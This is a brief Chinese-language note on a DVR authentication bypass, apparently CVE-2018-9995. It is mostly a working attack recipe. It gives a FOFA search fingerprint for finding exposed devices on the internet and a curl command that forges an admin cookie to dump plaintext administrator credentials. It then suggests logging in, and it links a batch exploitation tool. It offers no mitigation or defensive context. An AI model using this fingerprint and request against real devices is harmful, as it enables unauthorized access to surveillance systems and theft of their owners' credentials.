————背景说明————
个人方面没什么意图,主要之前有一次要做个赋能,顺口讲了一下,其实很简单,就简单记录一下。
此漏洞通过修改”Cookie:uid=admin”,以此访问特定DVR的控制面板,并可以返回此设备的明文管理员凭证。
————实验过程————
fofa搜索特征:"/longin.rsp"
利用方式:curl "http://URL/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
然后登录呗
也可以使用批量检测工具,我没用过,附上地址自己参考
https://github.com/ezelf/CVE-2018-9995_dvr_credentials